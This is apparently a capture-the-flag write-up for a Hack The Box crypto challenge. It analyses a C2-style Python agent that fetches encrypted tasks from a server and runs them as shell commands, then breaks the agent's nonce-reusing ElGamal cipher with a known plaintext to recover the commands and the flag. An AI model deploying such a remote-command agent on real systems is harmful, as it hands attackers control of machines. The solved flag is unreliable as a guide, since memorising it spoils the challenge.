
Information
Challenge: ElElGamal
Category: Crypto
Difficulty: Easy
Files: ElElGamal.zip 13 Kb
encryption.py 1 KB
agent.py 2 KB
traffic.pcapng 217 KB
Environment: Remnux VM
My Recommendations
Download it from hackthebox and verify it with:
sha256sum /path/to/ElElGamal.zip
SHA256SUM:
468415723baf153dec8f6b8bca34b5f96fbbe8a1ffcff301b4a11ef4d5fcbaa2 c3ccf87e19035eedbcf2
Walkthrough
1. Code Analysis
agent.py
from encryption import ElGamal
from base64 import b64decode, b64encode
from Crypto.Util.number import long_to_bytes, bytes_to_long
from time import sleep
import requests
import subprocess
import json
# Address of the server that the agent polls for its key and tasks.
IP = "192.168.1.6"
PORT = "5000"
HOST = f"http://{IP}:{PORT}"
# Single cipher instance shared by every helper below; main() overwrites
# el.y with the key fetched from the server.
el = ElGamal()
def getKey():
    """Fetch the key from the server's /key endpoint and return it as an int."""
    data = requests.get(HOST + "/key").json()
    print("Fetched the key!")
    # The "key" field is base64 text: decode it to bytes, then to an integer.
    key = data["key"]
    key = b64decode(key)
    key = bytes_to_long(key)
    return key
def establishedSession():
    """Return True if the first task decrypts to "Session established".

    NOTE(review): the write-up lost the original indentation; the nesting
    below is the most plausible reconstruction.
    """
    response = requests.get(HOST + "/tasks")
    if response.status_code == 200:
        encrypted_task = response.text
        task = decryptTask(encrypted_task)
        # The expected first plaintext is fixed, which gives an observer of
        # the traffic a known plaintext/ciphertext pair.
        if task == "Session established":
            return True
    return False
def decryptTask(encrypted_task):
    """Decrypt a "c1|c2" task string and return it as stripped text."""
    task = el.decrypt(encrypted_task)
    # el.decrypt hands back the output of long_to_bytes, hence the decode.
    task = task.decode().strip()
    return task
def encryptResult(result):
    """Encrypt ``result`` with the shared cipher instance.

    NOTE(review): ElGamal.encrypt builds its return value by concatenating
    str objects, so the ``.decode()`` below would fail on a str. Nothing in
    the visible code calls this helper.
    """
    task = el.encrypt(result)
    task = task.decode().strip()
    return task
def sendResult(result):
    """POST ``result`` to the server's /results endpoint."""
    # Wrapped in a dict under the "result" key and passed as the second
    # positional argument of requests.post (presumably sent as form data).
    result = {"result": result}
    requests.post(HOST + "/results", result)
def main():
    """Fetch the key, confirm the session, then poll for tasks and run them.

    NOTE(review): the write-up lost the original indentation. The nesting
    below is a reconstruction; in particular, whether the encrypt/send
    lines sit inside ``if result != ""`` cannot be confirmed from here.
    """
    key = getKey()
    sleep(10)
    # The fetched key becomes the exponent y used by both encrypt and
    # decrypt; it is set once and never changed afterwards.
    el.y = key
    if establishedSession():
        while True:
            # Poll the task endpoint every three seconds.
            sleep(3)
            response = requests.get(HOST + "/tasks")
            if response.status_code == 200:
                encrypted_task = response.text
                task = decryptTask(encrypted_task)
                try:
                    # The decrypted task text is executed as a shell command.
                    result = subprocess.check_output(task, shell=True)
                    result = result.decode()
                    if result != "":
                        # Only the first 50 characters of the output are
                        # returned, prefixed with "VALID ".
                        result = "VALID " + result[:50]
                        result = bytes_to_long(result.encode())
                        result = el.encrypt(result)
                        sendResult(result)
                except:
                    # Any failure is reported as the unencrypted text "Error".
                    sendResult("Error")
# Run the agent loop only when this file is executed as a script.
if __name__ == "__main__":
    main()
encryption.py
from Crypto.Util.number import bytes_to_long, long_to_bytes, inverse
from base64 import b64encode, b64decode
import random
class ElGamal:
    """ElGamal-style cipher shipped with the challenge (encryption.py).

    NOTE(review): the write-up lost the original indentation; the layout
    below is a reconstruction.
    """

    def __init__(self):
        # Fixed parameters: base g, modulus q, and h (produced by
        # generateKey, per the comment above that method).
        self.g = 10
        self.q = 855098176053225973412431085960229957742579395452812393691307482513933863589834014555492084425723928938458815455293344705952604659276623264708067070331
        self.h = 503261725767163645816647683654078455498654844869971762391249577031304598398963627308520614235127555024152461204399730504489081405546606977229017057765
        # Never assigned again in the visible code.
        self.s = None
        # Random by default; agent.py replaces it with the key fetched from
        # the server and then reuses that value for every message.
        self.y = random.randint(2, self.q)

    # This was used for self.h generation
    def generateKey(self) -> int:
        """Return g**x mod q for a freshly drawn random x."""
        x = random.randint(2, self.q)
        return pow(self.g, x, self.q)

    def encrypt(self, m: int) -> str:
        """Encrypt integer ``m`` and return "base64(c1)|base64(c2)"."""
        # The mask s depends only on h, y and q, so it is identical for every
        # message encrypted while y stays the same.
        s = pow(self.h, self.y, self.q)
        c1 = pow(self.g, self.y, self.q)
        c2 = (s * m) % self.q
        c1 = b64encode(long_to_bytes(c1)).decode()
        c2 = b64encode(long_to_bytes(c2)).decode()
        return c1 + "|" + c2

    def decrypt(self, ct: str) -> str:
        """Decrypt a "base64(c1)|base64(c2)" string.

        NOTE(review): annotated ``-> str``, but the value returned is the
        output of long_to_bytes (the caller in agent.py calls ``.decode()``
        on it).
        """
        c1, c2 = ct.split("|")
        c1 = bytes_to_long(b64decode(c1))
        c2 = bytes_to_long(b64decode(c2))
        # This first value of s is overwritten on the next line, so c1 has
        # no influence on the result.
        s = pow(c1, self.y, self.q)
        s = pow(self.h, self.y, self.q)
        # Undo the mask: m = c2 * s^-1 mod q.
        m = (c2 * inverse(s, self.q)) % self.q
        return long_to_bytes(m)
The main function first retrieves a key; this exchange is not in the recorded pcap. It then calls establishedSession(), which decrypts the first task and verifies that it equals “Session established”. Afterwards, it repeatedly fetches encrypted tasks, which appear in the pcap as HTTP responses with status code 200 (OK).
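The ElGamal implementation is insecure because it reuses the same nonce for every message: y is set once and never changes, so every ciphertext is masked with the same value s = h^y mod q (c2 = s · m mod q). Since we also know one of the plaintexts (the first response must be “Session established”), we can mount a nonce reuse attack on the rest of the data: for any other ciphertext, m_i = c2_i · m_0 · c2_0^(-1) mod q, where (m_0, c2_0) is the known pair.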
2. Pcap Parsing
First, we parse the pcap and clean up the data:
from scapy.all import *
def parse_pcap(pcap_path, portnumber):
    """Collect raw TCP payloads sent from ``portnumber`` in a capture file.

    Args:
        pcap_path: Path of the capture to read with scapy's ``rdpcap``.
        portnumber: TCP source port whose packets are kept.

    Returns:
        A list of Raw-layer payloads (bytes) longer than 5 bytes that do not
        contain ``HTTP/1.1``, i.e. with the HTTP header packets filtered out.
    """
    capture = rdpcap(pcap_path)
    grouped = capture.sessions()
    payloads = []
    for packets in grouped.values():
        for pkt in packets:
            # Keep only TCP traffic coming from the requested port.
            if TCP not in pkt or pkt[TCP].sport != portnumber:
                continue
            # Skip packets without a payload or with a very short one.
            if not pkt.haslayer('Raw') or len(pkt.load) <= 5:
                continue
            # Skip packets that carry the HTTP status line / headers.
            if b'HTTP/1.1' in pkt.load:
                continue
            payloads.append(pkt.getlayer('Raw').load)
    return payloads
def clean_tasks(encrypted_tasks):
    """Split captured ``c1|c2`` payloads into their two integer components.

    Args:
        encrypted_tasks: Iterable of raw payloads (bytes), each holding two
            base64 fields separated by ``|``.

    Returns:
        A list of ``{'c1': int, 'c2': int}`` dicts, one per payload, in the
        same order as the input.

    Raises:
        IndexError: If a payload does not contain a ``|`` separator.
    """
    # Imported locally so this snippet runs on its own: the write-up only
    # imports base64 / bytes_to_long in the later attack snippet, so calling
    # this function before that point used to fail with a NameError.
    import base64

    def to_int(field):
        # Big-endian bytes -> int (the conversion bytes_to_long performs).
        return int.from_bytes(base64.b64decode(field), 'big')

    parsed = []
    for task in encrypted_tasks:
        fields = task.split(b'|')
        parsed.append({'c1': to_int(fields[0]), 'c2': to_int(fields[1])})
    return parsed
# Pull every payload the server (port 5000, as configured in agent.py) sent,
# then turn each "c1|c2" payload into a pair of integers.
encrypted_tasks = parse_pcap('traffic.pcapng', 5000)
cleaned = clean_tasks(encrypted_tasks)
Next, we can proceed to the Nonce Reuse Attack.
3. Nonce Reuse Attack
The code for the attack is from here.
from Crypto.Util.number import long_to_bytes, bytes_to_long
import base64
# Parameters copied from encryption.py: h and g are kept for reference; the
# attack below only needs the modulus q.
h = 503261725767163645816647683654078455498654844869971762391249577031304598398963627308520614235127555024152461204399730504489081405546606977229017057765
q = 855098176053225973412431085960229957742579395452812393691307482513933863589834014555492084425723928938458815455293344705952604659276623264708067070331
g = 10
def nonce_reuse_attack(item, known_pt, known_ct):
    """Recover a plaintext from ``item`` using one known plaintext/ciphertext pair.

    Assumes every c2 value was produced as ``mask * message mod q`` with the
    same mask, so ``item * known_pt / known_ct`` (mod q) cancels the mask.

    Args:
        item: The c2 integer of the ciphertext to decrypt.
        known_pt: The known plaintext, as an integer.
        known_ct: The c2 integer of the ciphertext for ``known_pt``.

    Returns:
        The recovered plaintext as bytes.
    """
    # Modular inverse of the known ciphertext (three-argument pow with -1).
    inverse_known_ct = pow(known_ct, -1, q)
    recovered = int(inverse_known_ct * item * known_pt % q)
    return long_to_bytes(recovered)
# The first captured task is known to decrypt to "Session established"
# (agent.py checks for exactly that string), which gives the known pair.
known_ct = cleaned[0]['c2']
known_pt = bytes_to_long(b"Session established")
# Decrypt every remaining task with the known pair.
decrypted_full = [nonce_reuse_attack(i['c2'], known_pt, known_ct) for i in cleaned[1:]]
# errors="replace" keeps one undecodable plaintext from raising
# UnicodeDecodeError and discarding the rest of the output.
print(b'\n'.join(decrypted_full).decode(errors="replace"))
#[...]
#echo -n '-u "HTB{n3ve2_u53_' >> /opt/f.sh
#echo -n '7h3_54m3_k3y:)}" ' >> /opt/f.sh
#[..]





